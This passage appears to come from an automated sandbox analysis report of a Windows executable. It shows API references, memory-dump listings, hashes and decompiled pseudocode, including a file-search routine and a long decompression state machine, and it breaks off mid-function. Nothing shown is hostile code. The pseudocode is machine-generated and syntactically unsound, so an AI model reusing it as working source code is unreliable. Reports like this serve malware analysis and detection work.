0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000EDD1, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,1000DD34,?,?,?,?), ref: 1000EDD6
UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 1000EDDF

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 214e33ba25129c4f1801553cfac652c7af5a3a04dc081072cbe240b3bfcd4292
Instruction ID: 475294280d45927d435d88e39f52e4d2d8a09b9ce8b8de7cc260de07cd6ecf34
Opcode Fuzzy Hash: 214e33ba25129c4f1801553cfac652c7af5a3a04dc081072cbe240b3bfcd4292
Instruction Fuzzy Hash: 7CB09231044218EBEB022B91DC49B983FA8EB0A772F008190F60D46064CB7295948AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 1000D15C, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 7f24b4d4614ce05863261d46bd76723d78ebcd264821c7613c8cf7d6535b7002
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: D8C150322091930AEB5DD779843453EBEE19B926F132B076FD8B3CB5D8EE20D564D620

Uniqueness

Uniqueness Score: -1.00%

Function 1000D591, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 7b98b3cb7c96b7a21b38511c5c5e5b9957138209cd7cb5ad6140e57c3a367eec
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 3BC150362091930AEB5DD779843453EBEE19B926F132B076FD8B7CB5D8EE20C524D620

Uniqueness

Uniqueness Score: -1.00%

Function 00406043, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42daf0;
												if( *0x42daf0 != 0) {
													L22:
													_t412 =  *0x409364; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409368; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42c96c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42c968; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42c970;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42cdf0;
													if(_t416 < 0x42cdf0) {
														L15:
														__eflags = _t416 - 0x42cbac;
														_t438 = 8;
														if(_t416 > 0x42cbac) {
															__eflags = _t416 - 0x42cd70;
															if(_t416 >= 0x42cd70) {
																__eflags = _t416 - 0x42cdd0;
																if(_t416 < 0x42cdd0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42c970, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42c970 + _t440;
														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
														 *0x42daf0 =  *0x42daf0 + 1;
														__eflags =  *0x42daf0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
